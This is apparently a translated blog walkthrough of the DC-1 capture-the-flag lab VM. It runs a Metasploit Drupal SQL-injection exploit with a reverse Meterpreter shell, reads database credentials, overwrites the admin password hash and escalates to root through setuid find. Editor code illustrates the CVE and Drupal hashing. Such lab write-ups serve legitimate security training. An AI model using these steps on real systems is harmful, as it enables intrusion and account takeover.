DC Series Target Machine Penetration Walkthrough for Beginners: DC-1
Before starting a penetration test, have a methodology in mind.
1. Define the objective
Our objective is to collect every flag on the box.
Each flag's hint points the way to the next one.
2. Information gathering
Use a scanner to locate the target IP. Since the attacker and the target sit on the same subnet, an ARP sweep with arp-scan is enough (a host must answer ARP to talk at all, so unlike ICMP ping it cannot be filtered away by a host firewall):
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:f2:1a:d5, IPv4: 192.168.0.111
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1 f4:6a:92:10:12:f2 SHENZHEN FAST TECHNOLOGIES CO.,LTD
192.168.0.104 58:a0:23:79:16:11 Intel Corporate
192.168.0.100 48:2c:a0:e5:36:51 Xiaomi Communications Co Ltd
192.168.0.103 8c:c8:4b:60:79:f1 CHONGQING FUGUI ELECTRONICS CO.,LTD.
192.168.0.119 8c:c8:4b:60:79:f1 CHONGQING FUGUI ELECTRONICS CO.,LTD.
5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.038 seconds (125.61 hosts/sec). 5 responded
Because this is my own lab with only a handful of machines, the target obviously is 192.168.0.119. On a busier network, confirm the guess rather than assume it: run the sweep before and after powering on the target VM and take the address that newly appears.
3. Vulnerability detection
nmap -A turns on OS detection, version detection, default script scanning and traceroute in one go.
Adding nmap's built-in vulnerability scripts (--script=vuln) makes the scan considerably longer (218 seconds here) but reports the CVE directly:
└─# nmap --script=vuln -A 192.168.0.119
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-18 15:00 CST
Nmap scan report for localhost (192.168.0.119)
Host is up (0.0046s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=localhost
| Found the following possible CSRF vulnerabilities:
|
| Path: http://localhost:80/
| Form id: user-login-form
|_ Form action: /node?destination=node
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /rss.xml: RSS or Atom feed
| /robots.txt: Robots file
| /UPGRADE.txt: Drupal file
| /INSTALL.txt: Drupal file
| /INSTALL.mysql.txt: Drupal file
| /INSTALL.pgsql.txt: Drupal file
| /: Drupal version 7
| /README: Interesting, a readme.
| /README.txt: Interesting, a readme.
| /0/: Potentially interesting folder
|_ /user/: Potentially interesting folder
|_http-server-header: Apache/2.2.22 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2014-3704:
| VULNERABLE:
| Drupal - pre Auth SQL Injection Vulnerability   # nmap identified the SQL injection affecting this Drupal version
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-3704   # the CVE identifier; the description follows
| The expandArguments function in the database abstraction API in
| Drupal core 7.x before 7.32 does not properly construct prepared
| statements, which allows remote attackers to conduct SQL injection
| attacks via an array containing crafted keys.
|
| Disclosure date: 2014-10-15
| References:
| https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
| http://www.securityfocus.com/bid/70595
| https://www.drupal.org/SA-CORE-2014-005
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
# ......... remainder omitted .........
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 218.35 seconds
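To make nmap's description of CVE-2014-3704 concrete, here is an added example (editor's code, not from the original post and not Drupal's own PHP) that ports the essential logic of Drupal 7's expandArguments() to Python and contrasts the pre-7.32 behaviour with the SA-CORE-2014-005 fix. The login query and the array-valued name parameter are assumptions modelled on the public advisory, and the UPDATE text inside the key is a placeholder payload, not a working exploit.

```python
import re

# Assumed: the query Drupal 7's login validation runs (modelled on
# user_login_authenticate_validate); :name is bound to the submitted username.
LOGIN_QUERY = "SELECT * FROM {users} WHERE name = :name AND status = 1"

# Constructed input: PHP turns name[0 ;...]=bob&name[1]=bob into an array whose
# KEYS are attacker-controlled strings. The UPDATE text is a placeholder.
MALICIOUS_NAME = {
    "0 ;UPDATE users SET pass = 'HASH' WHERE uid = 1 ;#": "bob",
    1: "bob",
}


def expand_arguments(query, args, patched=False):
    """Port of DatabaseConnection::expandArguments() from Drupal 7.

    Drupal lets a placeholder be bound to an array (for IN (...) lists) and
    rewrites ':name' into ':name_<suffix>, :name_<suffix>, ...'.

    patched=False: pre-7.32, the suffix is the array KEY supplied by the caller,
                   so user data lands inside the SQL text itself.
    patched=True : 7.32 (SA-CORE-2014-005) iterates array_values(), so the
                   suffix is a positional index and only the VALUES are bound.
    """
    args = dict(args)
    modified = False
    for key, data in list(args.items()):
        if not isinstance(data, dict):          # array_filter($args, 'is_array')
            continue
        items = enumerate(data.values()) if patched else data.items()
        new_keys = {f"{key}_{i}": value for i, value in items}
        replacement = ", ".join(new_keys)
        # preg_replace('#:name\b#', implode(', ', array_keys($new_keys)), $query)
        query = re.sub(re.escape(key) + r"\b", lambda _m: replacement, query)
        del args[key]
        args.update(new_keys)                   # $args += $new_keys
        modified = True
    return query, args, modified


def vulnerable_login_query():
    """SQL text a pre-7.32 site would hand to PDO for the constructed input."""
    query, _args, _ = expand_arguments(LOGIN_QUERY, {":name": MALICIOUS_NAME})
    return query


def patched_login_query():
    """Same input through the fixed expansion: only :name_0, :name_1 appear."""
    query, _args, _ = expand_arguments(LOGIN_QUERY, {":name": MALICIOUS_NAME}, patched=True)
    return query


if __name__ == "__main__":
    print("pre-7.32:", vulnerable_login_query())
    print("7.32+   :", patched_login_query())
```

Because Drupal 7 uses PDO with emulated prepares, the whole rewritten string is sent to MySQL as-is: the `;` in the key starts a second statement and the `#` comments out the rest of the original query. The Metasploit module used below relies on the same primitive; its "form-cache PHP injection" target writes serialized PHP into the cache_form table instead of touching the users table.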
4. Vulnerability verification
Exploit the finding with Metasploit.
# Start the Metasploit console
msfconsole
[!] The following modules could not be loaded!
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] Please see /root/.msf4/logs/framework.log for details.
=[ metasploit v6.0.49-dev ]
+ -- --=[ 2142 exploits - 1141 auxiliary - 365 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Tired of setting RHOSTS for modules? Try
globally setting it with setg RHOSTS x.x.x.x
# We are in the msf console now. Remember the CVE number nmap reported? Search for it:
msf6 > search CVE-2014-3704
Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/multi/http/drupal_drupageddon  2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection

Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/drupal_drupageddon
# That is the module we want; select it
msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
# Look at the options it needs
msf6 exploit(multi/http/drupal_drupageddon) > show options
Module options (exploit/multi/http/drupal_drupageddon):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The target URI of the Drupal installation
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.111    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Drupal 7.0 - 7.31 (form-cache PHP injection method)
# RHOSTS (the target IP) is the only required option still empty. TARGETURI already defaults to /, which is where this Drupal lives, so it can stay.
# Set the missing option (rhost is accepted as an alias of RHOSTS):
msf6 exploit(multi/http/drupal_drupageddon) > set rhost 192.168.0.119
rhost => 192.168.0.119
# Launch
msf6 exploit(multi/http/drupal_drupageddon) > run
[*] Started reverse TCP handler on 192.168.0.111:4444
[*] Sending stage (39282 bytes) to 192.168.0.119
[*] Meterpreter session 1 opened (192.168.0.111:4444 -> 192.168.0.119:42439) at 2021-07-18 15:28:08 +0800
meterpreter >
# We have a Meterpreter session on the target. It runs as the web server user (www-data, as the shell prompt shows later), not as root.
5. Gathering the information we need
# We are now at the Meterpreter prompt: a command interface on the target with its own built-in commands.
# The file commands resemble bash. Start with ls to see what is there:
meterpreter > ls
Listing: /var/www
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 174 fil 2013-11-21 04:45:59 +0800 .gitignore
100644/rw-r--r-- 5767 fil 2013-11-21 04:45:59 +0800 .htaccess
100644/rw-r--r-- 1481 fil 2013-11-21 04:45:59 +0800 COPYRIGHT.txt
100644/rw-r--r-- 1451 fil 2013-11-21 04:45:59 +0800 INSTALL.mysql.txt
100644/rw-r--r-- 1874 fil 2013-11-21 04:45:59 +0800 INSTALL.pgsql.txt
100644/rw-r--r-- 1298 fil 2013-11-21 04:45:59 +0800 INSTALL.sqlite.txt
100644/rw-r--r-- 17861 fil 2013-11-21 04:45:59 +0800 INSTALL.txt
100755/rwxr-xr-x 18092 fil 2013-11-01 18:14:15 +0800 LICENSE.txt
100644/rw-r--r-- 8191 fil 2013-11-21 04:45:59 +0800 MAINTAINERS.txt
100644/rw-r--r-- 5376 fil 2013-11-21 04:45:59 +0800 README.txt
100644/rw-r--r-- 9642 fil 2013-11-21 04:45:59 +0800 UPGRADE.txt
100644/rw-r--r-- 6604 fil 2013-11-21 04:45:59 +0800 authorize.php
100644/rw-r--r-- 720 fil 2013-11-21 04:45:59 +0800 cron.php
100644/rw-r--r-- 52 fil 2019-02-19 21:20:46 +0800 flag1.txt   # here it is
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 includes
100644/rw-r--r-- 529 fil 2013-11-21 04:45:59 +0800 index.php
100644/rw-r--r-- 703 fil 2013-11-21 04:45:59 +0800 install.php
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 misc
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 modules
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 profiles
100644/rw-r--r-- 1561 fil 2013-11-21 04:45:59 +0800 robots.txt
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 scripts   # remember this directory, it matters later
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 sites
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 themes
100644/rw-r--r-- 19941 fil 2013-11-21 04:45:59 +0800 update.php
100644/rw-r--r-- 2178 fil 2013-11-21 04:45:59 +0800 web.config
100644/rw-r--r-- 417 fil 2013-11-21 04:45:59 +0800 xmlrpc.php
# flag1.txt stands out immediately
# cat it to read the contents
meterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you.
# The hint is clear enough: find the CMS configuration file.
# The ls above listed the site directory: 40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 sites
# Go in and look around
meterpreter > cd sites
meterpreter > ls
Listing: /var/www/sites
=======================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 904 fil 2013-11-21 04:45:59 +0800 README.txt
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 all
40555/r-xr-xr-x 4096 dir 2019-02-19 21:48:01 +0800 default
100644/rw-r--r-- 2365 fil 2013-11-21 04:45:59 +0800 example.sites.php
# There is a default folder; look inside
meterpreter > cd default
meterpreter > ls
Listing: /var/www/sites/default
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 23202 fil 2013-11-21 04:45:59 +0800 default.settings.php
40775/rwxrwxr-x 4096 dir 2019-02-19 21:10:31 +0800 files
100444/r--r--r-- 15989 fil 2019-02-19 21:48:01 +0800 settings.php
# That is the configuration file (Drupal keeps it at sites/default/settings.php). cat it:
meterpreter > cat settings.php
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
# ......... remainder omitted
# Set the flag2 hint aside for a moment; we have a database username and password, so log in to the database first.
# Drop into a system shell
meterpreter > shell
Process 3506 created.
Channel 9 created.
# Python is installed on the target, so getting a proper bash prompt is easy:
python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-1:/var/www/sites/default$
# A word on python -c "import pty;pty.spawn('/bin/bash')"
# Two parts. First, python -c "..." runs the quoted string as Python code straight from the command line,
# for example python -c "print('hello,world')". Mind the quoting: the outer and inner quotes must differ, or the shell ends the string early.
# Wrong: python -c "print("hello,world")" -- the shell hands print(hello,world) to Python, which fails:
#   Traceback (most recent call last):
#     File "<string>", line 1, in <module>
#   NameError: name 'hello' is not defined
#
# Second, import pty loads the pseudo-terminal module, and pty.spawn('/bin/bash') forks bash attached to a new pty.
# That upgrades the raw Meterpreter shell channel to a real terminal: you get a prompt, and interactive programs such as the mysql client behave properly.
# Now connect to the database with the recovered credentials.
# (Passing the password on the command line is fine in a lab; elsewhere it ends up in the process list and shell history.)
www-data@DC-1:/var/www/sites/default$ mysql -udbuser -pR0ck3t
mysql -udbuser -pR0ck3t
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4505
Server version: 5.5.60-0+deb7u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
# Logged in. First list the databases
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| drupaldb |
+--------------------+
2 rows in set (0.00 sec)
# drupaldb must be the site database; switch to it
mysql> use drupaldb
use drupaldb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
# List the tables
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_update |
| cache_views |
| cache_views_data |
| comment |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_comment_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users                       |   # the user table, look at this one
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+
80 rows in set (0.00 sec)
# Quite a long list; just pick out the table we need.
# The rows are wide, so end the query with \G to print each row vertically:
mysql> select * from users\G;
select * from users\G;
*************************** 1. row ***************************
uid: 0
name:
pass:
mail:
theme:
signature:
signature_format: NULL
created: 0
access: 0
login: 0
status: 0
timezone: NULL
language:
picture: 0
init:
data: NULL
*************************** 2. row ***************************
uid: 1
name: admin
pass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
mail: admin@example.com
theme:
signature:
signature_format: NULL
created: 1550581826
access: 1550583852
login: 1550582362
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: admin@example.com
data: b:0;
*************************** 3. row ***************************
uid: 2
name: Fred
pass: $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg
mail: fred@example.org
theme:
signature:
signature_format: filtered_html
created: 1550581952
access: 1550582225
login: 1550582225
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: fred@example.org
data: b:0;
3 rows in set (0.00 sec)
ERROR:
No query specified
# (\G already terminates the statement; the trailing ; sends an empty second statement, hence this harmless error)
# This hash format ($S$ prefix, 55 characters) is Drupal 7's own scheme, not PHP's password_hash(): a salted SHA-512 iterated 2^15 times, encoded with Drupal's base64 variant (see includes/password.inc).
# flag2 said brute force isn't the only way in. Since we can write to the database there is no need to crack anything: generate a new hash and overwrite the admin's.
# The scripts directory noted in the first ls ships password-hash.sh, which hashes a password exactly as Drupal does.
# Hash a password of our choosing:
www-data@DC-1:/var/www$ php scripts/password-hash.sh password
php scripts/password-hash.sh password
password: password hash: $S$D0OYptNw193DwK.usKa2LgiquAjo5e/z342ZI8W2dH4sTrx8G7Cq
# Back in mysql, overwrite one account's password with the new hash:
mysql> update users set pass="$S$D0OYptNw193DwK.usKa2LgiquAjo5e/z342ZI8W2dH4sTrx8G7Cq" where uid=1;
Query OK, 0 rows affected (0.00 sec)
Rows matched: 1 Changed: 0 Warnings: 0
# Changed: 0 means the stored value already equalled the new hash (the statement had evidently been run once before); a first run reports Changed: 1.
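An added example (editor's code, not from the post and not Drupal's PHP) that reimplements Drupal 7's password hashing from includes/password.inc in Python, so the hash password-hash.sh printed above can be checked offline and the format explained: `$S$`, one character giving log2 of the iteration count ('D' = 15, so 32768 rounds of SHA-512), an 8-character salt, then the digest in Drupal's own base64 alphabet, truncated to 55 characters. The only inputs taken from the page are the hash and the password it was made from.

```python
import hashlib
import os

# Constants from Drupal 7 includes/password.inc
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55
DRUPAL_HASH_COUNT = 15        # default log2 of the iteration count, encoded as 'D'
DRUPAL_MIN_HASH_COUNT = 7
DRUPAL_MAX_HASH_COUNT = 30

# Hash and password taken from the walkthrough above (output of password-hash.sh)
PAGE_HASH = "$S$D0OYptNw193DwK.usKa2LgiquAjo5e/z342ZI8W2dH4sTrx8G7Cq"
PAGE_PASSWORD = "password"


def _password_base64_encode(data):
    """Drupal's phpass-style base64: 6-bit groups, least significant bits first."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def _password_crypt(password, setting):
    """_password_crypt('sha512', ...): iterated, salted SHA-512 keyed by the 12-char setting."""
    setting = setting[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        return None
    count_log2 = ITOA64.find(setting[3])       # 'D' -> 15
    if not DRUPAL_MIN_HASH_COUNT <= count_log2 <= DRUPAL_MAX_HASH_COUNT:
        return None
    salt = setting[4:12]
    pw = password.encode("utf-8")
    digest = hashlib.sha512(salt.encode("ascii") + pw).digest()
    for _ in range(1 << count_log2):           # do { ... } while (--$count)
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _password_base64_encode(digest))[:DRUPAL_HASH_LENGTH]


def user_hash_password(password, count_log2=DRUPAL_HASH_COUNT):
    """What scripts/password-hash.sh prints: fresh random 6-byte salt, default cost."""
    setting = "$S$" + ITOA64[count_log2] + _password_base64_encode(os.urandom(6))
    return _password_crypt(password, setting)


def user_check_password(password, stored_hash):
    """user_check_password() for $S$ hashes: recompute with the stored setting and compare."""
    if not stored_hash.startswith("$S$"):
        return False
    computed = _password_crypt(password, stored_hash)
    return computed is not None and computed == stored_hash


if __name__ == "__main__":
    print("page hash matches 'password':", user_check_password(PAGE_PASSWORD, PAGE_HASH))
    print("fresh hash for the same password:", user_hash_password(PAGE_PASSWORD))
```

Every check costs 32769 SHA-512 computations, which is what makes a dictionary attack on the admin hash slow and why overwriting the hash is the quicker route on this box. The same user_check_password() is what you would use to confirm a cracked candidate offline; note that two hashes of the same password never match each other because the salt is random, only recomputation with the stored salt does.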
# Now we can log in to the site as admin with the password we chose.
# Log in through the web form.
# Once logged in, flag3 is shown in the Dashboard at the top left of the site:
flag3
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
# Read the capitalised words: PERMS, FIND and -exec. The hint is about the find command, special permission bits (setuid) and find's -exec option; passwd and shadow refer to /etc/passwd and /etc/shadow.
# First, use find to locate flag4:
www-data@DC-1:/var/www$ find / -name 'flag4*' 2>/dev/null
find / -name 'flag4*' 2>/dev/null
# (quote the pattern so the shell cannot expand it first; 2>/dev/null hides the permission-denied noise from directories www-data cannot read)
/home/flag4
/home/flag4/flag4.txt
# Found both a directory named flag4 and a flag4.txt inside it.
# Read the file:
www-data@DC-1:/home/flag4$ cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
# So the last flag sits in /root, and reading it requires root privileges.
# The intended route is privilege escalation through find, as flag3 hinted. find's -exec option runs a command for each matching file, and on DC-1 the find binary carries the setuid bit with root as owner (the "special PERMS"): check with ls -l on the find binary, where the owner's execute position shows s instead of x, or list every such file with find's -perm -4000 test.
# A setuid-root find runs with effective UID 0, and the child spawned by -exec inherits that. Spawn /bin/sh rather than bash: on Debian 7 /bin/sh is dash, which keeps the inherited effective UID, whereas bash drops it unless started with -p.
www-data@DC-1:/home/flag4$ find flag4.txt -exec "/bin/sh" \;
find flag4.txt -exec "/bin/sh" \;
# Verify the escalation
whoami
root
# Success: the effective user is root
cd /root
ls
thefinalflag.txt
# The last flag
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
# Done
6. Summary
A recap of what this box taught, for later review:
- arp-scan -l located the target quickly
- nmap's built-in vuln scripts identified the vulnerability (CVE-2014-3704)
- Metasploit exploited it (exploit/multi/http/drupal_drupageddon)
- settings.php under sites/default held the database credentials
- Python's pty module upgraded the shell to an interactive bash:
python -c "import pty;pty.spawn('/bin/bash')"
- Drupal's own hashing script produced a replacement hash, and an UPDATE replaced the existing user's password:
php scripts/password-hash.sh password
update [table] set [column]="[new value]" where [condition];
- Privilege escalation via setuid find; /bin/sh keeps the root effective UID, so that is the shell to spawn:
find [existing file] -exec /bin/sh \;
Questions are welcome by direct message or in the comments; let's improve together.
Please credit the source when reposting. Original link: https://www.uj5u.com/qita/289171.html